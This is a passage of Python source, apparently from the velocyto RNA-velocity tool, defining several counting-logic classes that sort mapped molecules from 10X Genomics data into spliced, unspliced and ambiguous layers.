Arguments
---------
molitem: vcy.Molitem
The :py:class:`vcy.Molitem` object to be considered by the logic
cell_bcidx: int
The cell index in the memory buffers below
dict_layers_columns: Dict[str, np.ndarray]
A dictionary mapping the name of a layer with the memory buffer that will be saved in the loom file after counting
geneid2ix: Dict[str, int]
Dictionary containing the Acession of the genes mapping to its column index position
Returns
-------
Nothing but it adds the molecule to the appropriate layer (or does not count at all)
"""
# NOTE I need to generalize this to any set of layers
return None
class Permissive10X(Logic):
"""Permissive logic for 10X Genomics chemistry
This logic differs from the other 10x Logics because:
- singletons if the fall in not validated introns are COUNTED UNSPLICED
- singletons if the fall in validated introns are COUNTED UNSPLICED
- non-singletons if are supported by not validated introns are COUNTED UNSPLICED
- non-singletons if are supported by validated introns are COUNTED UNSPLICED
"""
def __init__(self) -> None:
self.name = "Permissive10X"
@property
def layers(self) -> List[str]: # This should be overridden if a different set of layers is desired
return ["spliced", "unspliced", "ambiguous"]
@property
def stranded(self) -> bool:
return True
@property
def perform_validation_markup(self) -> bool:
return True
@property
def accept_discordant(self) -> bool:
return False
def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> int:
# NOTE This can be simplified qyuite a bit, without loss of acuracy!
# The hits are not compatible with any annotated transcript model
spliced = dict_layers_columns["spliced"]
unspliced = dict_layers_columns["unspliced"]
ambiguous = dict_layers_columns["ambiguous"]
# The hits are not compatible with any annotated transcript model
if len(molitem.mappings_record) == 0:
return 2
# Compatible with one or more transcript models:
else:
# Check that there are not different possible genes ??
if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
gene_check: Set[str] = set()
has_onlyintron_model = 0
has_only_span_exin_model = 1
has_onlyintron_and_valid_model = 0
has_valid_mixed_model = 0
has_invalid_mixed_model = 0
has_onlyexo_model = 0
has_mixed_model = 0
multi_gene = 0
for transcript_model, segments_list in molitem.mappings_record.items():
gene_check.add(transcript_model.geneid)
if len(gene_check) > 1:
multi_gene = 1
has_introns = 0
has_exons = 0
has_exseg_with_spliced_flag = 0
has_validated_intron = 0
has_exin_intron_span = 0
has_non3prime = 0
for segment_match in segments_list:
if segment_match.maps_to_intron:
has_introns = 1
if segment_match.feature.is_validated:
has_validated_intron = 1
if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
downstream_exon = segment_match.feature.get_downstream_exon()
if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
upstream_exon = segment_match.feature.get_upstream_exon()
if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
elif segment_match.maps_to_exon:
has_exons = 1
if not segment_match.feature.is_last_3prime:
has_non3prime = 1
if segment_match.is_spliced:
has_exseg_with_spliced_flag = 1
if has_validated_intron and not has_exons:
has_onlyintron_and_valid_model = 1
if has_introns and not has_exons:
has_onlyintron_model = 1
if has_exons and not has_introns:
has_onlyexo_model = 1
if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
has_invalid_mixed_model = 1
has_mixed_model = 1
if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
has_valid_mixed_model = 1
has_mixed_model = 1
if not has_exin_intron_span:
has_only_span_exin_model = 0
if multi_gene:
# Many genes are compatible with the observation, do not count
return 1
else:
if not len(molitem.mappings_record):
# No gene is compatible with the observation, do not count
return 2
else:
if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
# More common situation, normal exonic read, count as spliced
gene_ix = geneid2ix[transcript_model.geneid]
spliced[gene_ix, cell_bcidx] += 1
return 0
if has_only_span_exin_model:
# All the compatible transcript models have spanning exon-intron boundaries, count unspliced
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return 0
if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return 0
else:
# Non-singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return 0
if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in non-validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return 0
else:
# Non-singleton in non-validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return 0
if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant. Count anyways
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return 0
if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return 0
if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return 0
if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
# Very rare, at least in 10X.
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1 # this was ambiguous in a previous version
return 0
if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return 0
if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return 3
class Intermediate10X(Logic):
"""ValidatedIntrons logic for 10X Genomics chemistry
This differs from the other 10x Logics because:
- singletons if the fall in not validated introns are DISCARDED
- singletons if the fall in validated introns are COUNTED UNSPLICED
- non-singletons if are supported by not validated introns are COUNTED UNSPLICED
- non-singletons if are supported by validated introns are COUNTED UNSPLICED
"""
def __init__(self) -> None:
self.name = "Intermediate10X"
@property
def layers(self) -> List[str]: # This should be overridden if a different set of layers is desired
return ["spliced", "unspliced", "ambiguous"]
@property
def stranded(self) -> bool:
return True
@property
def perform_validation_markup(self) -> bool:
return True
@property
def accept_discordant(self) -> bool:
return False
def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
# NOTE This can be simplified qyuite a bit, without loss of acuracy!
# The hits are not compatible with any annotated transcript model
spliced = dict_layers_columns["spliced"]
unspliced = dict_layers_columns["unspliced"]
ambiguous = dict_layers_columns["ambiguous"]
# The hits are not compatible with any annotated transcript model
if len(molitem.mappings_record) == 0:
return
# Compatible with one or more transcript models:
else:
# Check that there are not different possible genes ??
if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
gene_check: Set[str] = set()
has_onlyintron_model = 0
has_only_span_exin_model = 1
has_onlyintron_and_valid_model = 0
has_valid_mixed_model = 0
has_invalid_mixed_model = 0
has_onlyexo_model = 0
has_mixed_model = 0
multi_gene = 0
for transcript_model, segments_list in molitem.mappings_record.items():
gene_check.add(transcript_model.geneid)
if len(gene_check) > 1:
multi_gene = 1
has_introns = 0
has_exons = 0
has_exseg_with_spliced_flag = 0
has_validated_intron = 0
has_exin_intron_span = 0
has_non3prime = 0
for segment_match in segments_list:
if segment_match.maps_to_intron:
has_introns = 1
if segment_match.feature.is_validated:
has_validated_intron = 1
if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
downstream_exon = segment_match.feature.get_downstream_exon()
if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
upstream_exon = segment_match.feature.get_upstream_exon()
if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
elif segment_match.maps_to_exon:
has_exons = 1
if not segment_match.feature.is_last_3prime:
has_non3prime = 1
if segment_match.is_spliced:
has_exseg_with_spliced_flag = 1
if has_validated_intron and not has_exons:
has_onlyintron_and_valid_model = 1
if has_introns and not has_exons:
has_onlyintron_model = 1
if has_exons and not has_introns:
has_onlyexo_model = 1
if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
has_invalid_mixed_model = 1
has_mixed_model = 1
if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
has_valid_mixed_model = 1
has_mixed_model = 1
if not has_exin_intron_span:
has_only_span_exin_model = 0
if multi_gene:
# many genes are compatible with the observation, do not count
return
else:
if not len(molitem.mappings_record):
# no gene is compatible with the observation, do not count
return
else:
if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
# More common situation, normal exonic read, count as spliced
gene_ix = geneid2ix[transcript_model.geneid]
spliced[gene_ix, cell_bcidx] += 1
return
if has_only_span_exin_model:
# All the compatible transcript models have spanning exon-intron boundaries, count unspliced
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
else:
# Non singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in non-validated intron
return
else:
# Non-singleton in non-validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant.
return
if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare.
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare.
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
class ValidatedIntrons10X(Logic):
"""ValidatedIntrons logic for 10X Genomics chemistry
This differs from the other 10x Logics because:
- singletons if the fall in not validated introns are DISCARDED
- singletons if the fall in validated introns are COUNTED UNSPLICED
- non-singletons if are supported by not validated introns are DISCARDED
- non-singletons if are supported by validated introns are COUNTED UNSPLICED
"""
def __init__(self) -> None:
self.name = "ValidatedIntrons10X"
@property
def layers(self) -> List[str]: # This should be overridden if a different set of layers is desired
return ["spliced", "unspliced", "ambiguous"]
@property
def stranded(self) -> bool:
return True
@property
def perform_validation_markup(self) -> bool:
return True
@property
def accept_discordant(self) -> bool:
return False
def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
# NOTE This can be simplified qyuite a bit, without loss of acuracy!
# The hits are not compatible with any annotated transcript model
spliced = dict_layers_columns["spliced"]
unspliced = dict_layers_columns["unspliced"]
ambiguous = dict_layers_columns["ambiguous"]
# The hits are not compatible with any annotated transcript model
if len(molitem.mappings_record) == 0:
return
# Compatible with one or more transcript models:
else:
# Check that there are not different possible genes ??
if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
gene_check: Set[str] = set()
has_onlyintron_model = 0
has_only_span_exin_model = 1
has_onlyintron_and_valid_model = 0
has_valid_mixed_model = 0
has_invalid_mixed_model = 0
has_onlyexo_model = 0
has_mixed_model = 0
multi_gene = 0
for transcript_model, segments_list in molitem.mappings_record.items():
gene_check.add(transcript_model.geneid)
if len(gene_check) > 1:
multi_gene = 1
has_introns = 0
has_exons = 0
has_exseg_with_spliced_flag = 0
has_validated_intron = 0
has_exin_intron_span = 0
has_non3prime = 0
for segment_match in segments_list:
if segment_match.maps_to_intron:
has_introns = 1
if segment_match.feature.is_validated:
has_validated_intron = 1
if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
downstream_exon = segment_match.feature.get_downstream_exon()
if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
upstream_exon = segment_match.feature.get_upstream_exon()
if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
elif segment_match.maps_to_exon:
has_exons = 1
if not segment_match.feature.is_last_3prime:
has_non3prime = 1
if segment_match.is_spliced:
has_exseg_with_spliced_flag = 1
if has_validated_intron and not has_exons:
has_onlyintron_and_valid_model = 1
if has_introns and not has_exons:
has_onlyintron_model = 1
if has_exons and not has_introns:
has_onlyexo_model = 1
if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
has_invalid_mixed_model = 1
has_mixed_model = 1
if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
has_valid_mixed_model = 1
has_mixed_model = 1
if not has_exin_intron_span:
has_only_span_exin_model = 0
if multi_gene:
# many genes are compatible with the observation, do not count
return
else:
if not len(molitem.mappings_record):
# no gene is compatible with the observation, do not count
return
else:
if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
# More common situation, normal exonic read, count as spliced
gene_ix = geneid2ix[transcript_model.geneid]
spliced[gene_ix, cell_bcidx] += 1
return
if has_only_span_exin_model:
# All the compatible transcript models have spanning exon-intron boundaries, count unspliced
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
else:
# Non singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in non-validated intron
return
else:
# Non-singleton in non-validated intron
return
if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant.
return
if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare.
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare.
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
class Stricter10X(Logic):
"""Stricter logic for 10X Genomics chemistry
This differ from the other 10x Logics because:
- singletons if the fall in not validated introns are DISCARDED
- singletons if the fall in validated introns are DISCARDED
- non-singletons if are supported by not validated introns are DISCARDED
- non-singletons if are supported by validated introns are COUNTED UNSPLICED
"""
def __init__(self) -> None:
self.name = "Stricter10X"
@property
def layers(self) -> List[str]: # This should be overridden if a different set of layers is desired
return ["spliced", "unspliced", "ambiguous"]
@property
def stranded(self) -> bool:
return True
@property
def perform_validation_markup(self) -> bool:
return True
def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
# NOTE This can be simplified qyuite a bit, without loss of acuracy!
# The hits are not compatible with any annotated transcript model
spliced = dict_layers_columns["spliced"]
unspliced = dict_layers_columns["unspliced"]
ambiguous = dict_layers_columns["ambiguous"]
# The hits are not compatible with any annotated transcript model
if len(molitem.mappings_record) == 0:
return
# Compatible with one or more transcript models:
else:
# Check that there are not different possible genes ??
if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
gene_check: Set[str] = set()
has_onlyintron_model = 0
has_only_span_exin_model = 1
has_onlyintron_and_valid_model = 0
has_valid_mixed_model = 0
has_invalid_mixed_model = 0
has_onlyexo_model = 0
has_mixed_model = 0
multi_gene = 0
for transcript_model, segments_list in molitem.mappings_record.items():
gene_check.add(transcript_model.geneid)
if len(gene_check) > 1:
multi_gene = 1
has_introns = 0
has_exons = 0
has_exseg_with_spliced_flag = 0
has_validated_intron = 0
has_exin_intron_span = 0
has_non3prime = 0
for segment_match in segments_list:
if segment_match.maps_to_intron:
has_introns = 1
if segment_match.feature.is_validated:
has_validated_intron = 1
if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
downstream_exon = segment_match.feature.get_downstream_exon()
if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
upstream_exon = segment_match.feature.get_upstream_exon()
if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
elif segment_match.maps_to_exon:
has_exons = 1
if not segment_match.feature.is_last_3prime:
has_non3prime = 1
if segment_match.is_spliced:
has_exseg_with_spliced_flag = 1
if has_validated_intron and not has_exons:
has_onlyintron_and_valid_model = 1
if has_introns and not has_exons:
has_onlyintron_model = 1
if has_exons and not has_introns:
has_onlyexo_model = 1
if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
has_invalid_mixed_model = 1
has_mixed_model = 1
if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
has_valid_mixed_model = 1
has_mixed_model = 1
if not has_exin_intron_span:
has_only_span_exin_model = 0
if multi_gene:
# many genes are compatible with the observation, do not count
return
else:
if not len(molitem.mappings_record):
# no gene is compatible with the observation, do not count
return
else:
if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
# More common situation, normal exonic read, count as spliced
gene_ix = geneid2ix[transcript_model.geneid]
spliced[gene_ix, cell_bcidx] += 1
return
if has_only_span_exin_model:
# All the compatible transcript models have spanning exon-intron boundaries, count unspliced
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in validated intron, do not count
return
else:
# Non singleton in validated intron
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in non-validated intron
return
else:
# Non-singleton in non-validated intron
return
if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant.
return
if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare.
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare.
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
class ObservedSpanning10X(Logic):
"""ObservedSpanning10X logic for 10X Genomics chemistry
This differ from the other 10x Logics because:
- singletons if the fall in not validated introns are DISCARDED
- singletons if the fall in validated introns are DISCARDED
- non-singletons if are supported by not validated introns are DISCARDED
- non-singletons if are supported by validated introns are DISCARDED
- Therefore only the observed intron spanning reads are counted as UNSPLICED
"""
def __init__(self) -> None:
self.name = "ObservedSpanning10X"
@property
def layers(self) -> List[str]: # This should be overridden if a different set of layers is desired
return ["spliced", "unspliced", "ambiguous"]
@property
def stranded(self) -> bool:
return True
@property
def perform_validation_markup(self) -> bool:
return True
@property
def accept_discordant(self) -> bool:
return False
def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
# NOTE This can be simplified qyuite a bit, without loss of acuracy!
# The hits are not compatible with any annotated transcript model
spliced = dict_layers_columns["spliced"]
unspliced = dict_layers_columns["unspliced"]
ambiguous = dict_layers_columns["ambiguous"]
# The hits are not compatible with any annotated transcript model
if len(molitem.mappings_record) == 0:
return
# Compatible with one or more transcript models:
else:
# Check that there are not different possible genes ??
if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
gene_check: Set[str] = set()
has_onlyintron_model = 0
has_only_span_exin_model = 1
has_onlyintron_and_valid_model = 0
has_valid_mixed_model = 0
has_invalid_mixed_model = 0
has_onlyexo_model = 0
has_mixed_model = 0
multi_gene = 0
for transcript_model, segments_list in molitem.mappings_record.items():
gene_check.add(transcript_model.geneid)
if len(gene_check) > 1:
multi_gene = 1
has_introns = 0
has_exons = 0
has_exseg_with_spliced_flag = 0
has_validated_intron = 0
has_exin_intron_span = 0
has_non3prime = 0
for segment_match in segments_list:
if segment_match.maps_to_intron:
has_introns = 1
if segment_match.feature.is_validated:
has_validated_intron = 1
if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
downstream_exon = segment_match.feature.get_downstream_exon()
if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
upstream_exon = segment_match.feature.get_upstream_exon()
if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
elif segment_match.maps_to_exon:
has_exons = 1
if not segment_match.feature.is_last_3prime:
has_non3prime = 1
if segment_match.is_spliced:
has_exseg_with_spliced_flag = 1
if has_validated_intron and not has_exons:
has_onlyintron_and_valid_model = 1
if has_introns and not has_exons:
has_onlyintron_model = 1
if has_exons and not has_introns:
has_onlyexo_model = 1
if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
has_invalid_mixed_model = 1
has_mixed_model = 1
if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
has_valid_mixed_model = 1
has_mixed_model = 1
if not has_exin_intron_span:
has_only_span_exin_model = 0
if multi_gene:
# Many genes are compatible with the observation, do not count
return
else:
if not len(molitem.mappings_record):
# No gene is compatible with the observation, do not count
return
else:
if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
# More common situation, normal exonic read, count as spliced
gene_ix = geneid2ix[transcript_model.geneid]
spliced[gene_ix, cell_bcidx] += 1
return
if has_only_span_exin_model:
# All the compatible transcript models have spanning exon-intron boundaries, count unspliced
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in validated intron, do not count
return
else:
# Non-singleton in validated intron, do not count
return
if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
# Singleton in non-validated intron
return
else:
# Non-singleton in non-validated intron
return
if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant.
return
if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
# Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare.
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Count ambiguous
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
# Ambiguity among the transcript models compatible with the mapping. Very rare.
gene_ix = geneid2ix[transcript_model.geneid]
ambiguous[gene_ix, cell_bcidx] += 1
return
class Discordant10X(Logic):
"""Just a test
"""
def __init__(self) -> None:
self.name = "Discordant10X"
@property
def layers(self) -> List[str]: # This should be overridden if a different set of layers is desired
return ["spliced", "unspliced", "ambiguous"]
@property
def stranded(self) -> bool:
return True
@property
def perform_validation_markup(self) -> bool:
return True
@property
def accept_discordant(self) -> bool:
return True
def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
# NOTE This can be simplified qyuite a bit, without loss of acuracy!
# The hits are not compatible with any annotated transcript model
spliced = dict_layers_columns["spliced"]
unspliced = dict_layers_columns["unspliced"]
ambiguous = dict_layers_columns["ambiguous"]
# The hits are not compatible with any annotated transcript model
if len(molitem.mappings_record) == 0:
return
# Compatible with one or more transcript models:
else:
# Check that there are not different possible genes ??
if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
gene_check: Set[str] = set()
has_onlyintron_model = 0
has_only_span_exin_model = 1
has_onlyintron_and_valid_model = 0
has_valid_mixed_model = 0
has_invalid_mixed_model = 0
has_onlyexo_model = 0
has_mixed_model = 0
multi_gene = 0
for transcript_model, segments_list in molitem.mappings_record.items():
gene_check.add(transcript_model.geneid)
if len(gene_check) > 1:
multi_gene = 1
has_introns = 0
has_exons = 0
has_exseg_with_spliced_flag = 0
has_validated_intron = 0
has_exin_intron_span = 0
has_non3prime = 0
for segment_match in segments_list:
if segment_match.maps_to_intron:
has_introns = 1
if segment_match.feature.is_validated:
has_validated_intron = 1
if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
downstream_exon = segment_match.feature.get_downstream_exon()
if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
upstream_exon = segment_match.feature.get_upstream_exon()
if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
has_exin_intron_span = 1
elif segment_match.maps_to_exon:
has_exons = 1
if not segment_match.feature.is_last_3prime:
has_non3prime = 1
if segment_match.is_spliced:
has_exseg_with_spliced_flag = 1
if has_validated_intron and not has_exons:
has_onlyintron_and_valid_model = 1
if has_introns and not has_exons:
has_onlyintron_model = 1
if has_exons and not has_introns:
has_onlyexo_model = 1
if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
has_invalid_mixed_model = 1
has_mixed_model = 1
if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
has_valid_mixed_model = 1
has_mixed_model = 1
if not has_exin_intron_span:
has_only_span_exin_model = 0
if multi_gene:
# Many genes are compatible with the observation, do not count
return
else:
if not len(molitem.mappings_record):
# No gene is compatible with the observation, do not count
return
else:
if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
# More common situation, normal exonic read, count as spliced
gene_ix = geneid2ix[transcript_model.geneid]
spliced[gene_ix, cell_bcidx] += 1
return
if has_only_span_exin_model:
# All the compatible transcript models have spanning exon-intron boundaries, count unspliced
gene_ix = geneid2ix[transcript_model.geneid]
unspliced[gene_ix, cell_bcidx] += 1
return
if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
if len(segments_list) == 1:
